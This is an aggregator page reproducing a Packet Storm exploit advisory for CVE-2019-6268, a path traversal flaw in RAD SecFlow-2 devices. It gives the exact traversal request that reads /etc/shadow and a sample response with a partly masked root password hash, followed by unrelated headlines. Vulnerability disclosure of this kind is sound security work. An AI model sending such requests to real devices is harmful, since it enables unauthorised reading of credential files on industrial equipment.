Headline

RAD SecFlow-2 Path Traversal

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.

8 months ago

Packet Storm

Open in Source

#vulnerability #php #auth

# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63# Date: 3/2024# CVE: CVE-2019-6268# Exploit Author: Branko MilicevicRAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.Steps to reproduce:Request:GET /../../../../../../../../../../etc/shadow HTTP/1.1Response:HTTP/1.1 200 OKroot:nDnjJ****ydh3:11851:0:99999:7:::bin:*:11851:0:99999:7:::daemon:*:11851:0:99999:7:::adm:*:11851:0:99999:7:::lp:*:11851:0:99999:7:::sync:*:11851:0:99999:7:::shutdown:*:11851:0:99999:7:::Vulnerability TypeDirectory TraversalAttack VectorsUnauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).Referencehttps://www.owasp.org/index.php/Path_Traversal

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

22 hours ago

Packet Storm

TX Text Control .NET Server For ASP.NET Arbitrary File Read / Write

22 hours ago

Packet Storm

GravCMS 1.10.7 Arbitrary YAML Write / Update

22 hours ago

Packet Storm

PHP-CGI Argument Injection Remote Code Execution

23 hours ago

Packet Storm

PHP-CGI Argument Injection Susceptibility Scanner

23 hours ago

Packet Storm